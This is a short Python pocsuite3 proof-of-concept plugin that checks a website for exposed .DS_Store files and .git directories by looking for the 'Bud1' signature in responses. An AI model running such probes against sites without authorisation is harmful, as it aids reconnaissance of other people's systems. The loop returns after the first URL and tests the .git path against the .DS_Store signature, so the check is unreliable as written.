from pocsuite3.api import POCBase, VUL_TYPE, POC_CATEGORY, requests, Output, register_poc,logger


class InfoDiscovery(POCBase):
    vulID = '005'  # vul ID
    version = '3'
    author = ['cor0ps']
    vulDate = '2020-06-10'
    createDate = '2020-06-10'
    updateDate = '2020-06-10'
    references = ['http://www.securityfocus.com/bid/3324/discuss','https://github.com/BugScanTeam/GitHack']
    name = '信息泄露'
    appPowerLink = ''
    appName = 'InfoDiscovery'
    appVersion = 'All'
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE
    desc = '''
        在开发过程中开发者可能会把 .git | .bak | .DS_Store 文件上传到网站上导致
        信息泄露漏洞。
    '''

    samples = ['']
    install_requires = []
    category = POC_CATEGORY.EXPLOITS.REMOTE
    protocol = POC_CATEGORY.PROTOCOL.HTTP

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        urls=[]
        #这里要处理下输入的url是否带了/
        urls.append(self.url+'/.DS_Store')
        urls.append(self.url + '/.git/')
        for url in urls:
            response = requests.get(url,headers=self.headers,allow_redirects=False)
            logger.info("url:{},status:{}".format(url,response.status_code))
            #Bud1
            if response.status_code == 200 and b'\x00\x00\x00\x01\x42\x75\x64\x31' in response.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['Info'] = self.name
                result['VerifyInfo']['URL'] = self.url
            return self.parse_verify(result)

    def _run(self):
        pass

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('InfoDiscovery target is not vulnerable')
        return output


register_poc(InfoDiscovery)
